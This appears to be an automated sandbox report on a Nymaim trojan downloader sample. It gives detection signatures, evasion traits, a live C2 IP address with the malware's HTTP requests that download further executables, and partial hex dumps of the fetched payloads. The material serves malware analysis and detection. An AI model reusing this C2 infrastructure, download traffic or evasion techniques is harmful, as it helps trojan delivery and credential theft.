Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565534
MD5: 9d2eed099096486e2ae388b2b220497c
SHA1: c84457bca7db83641fd56925c6496b4c9a8c6c5b
SHA256: 5d5a9d7c44e0dbd125b577319dcad5274121c38b6cde03658eb83c49e316d307
Tags: exe user-Bitsight

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

AV Detection

Source: 1.2.file.exe.400000.0.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe ReversingLabs: Detection: 75%
Source: file.exe ReversingLabs: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 1_2_004035D0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04933837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 1_2_04933837
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00417727 FindFirstFileExW, 1_2_00417727
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10007EA9 FindFirstFileExW, 1_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0494798E FindFirstFileExW, 1_2_0494798E

Networking

Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 04:35:53 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 04:35:54 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: Joe Sandbox View IP Address: 185.156.72.65 185.156.72.65
Source: Joe Sandbox View ASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 1_2_00401970
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/download
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/key
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/files/download
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/soft/download
Source: Amcache.hve.14.dr String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: https://iplogger.org/1Pz8p7

E-Banking Fraud

Source: Yara match File source: 1.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1309173402.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00403D40 1_2_00403D40
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402EE0 1_2_00402EE0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00404F70 1_2_00404F70
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00410940 1_2_00410940
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041A346 1_2_0041A346
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040EBC7 1_2_0040EBC7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00415E59 1_2_00415E59
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040B6D0 1_2_0040B6D0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040EF09 1_2_0040EF09
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041572E 1_2_0041572E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_1000E184 1_2_1000E184
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_100102A0 1_2_100102A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00601846 1_2_00601846
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DA074 1_2_005DA074
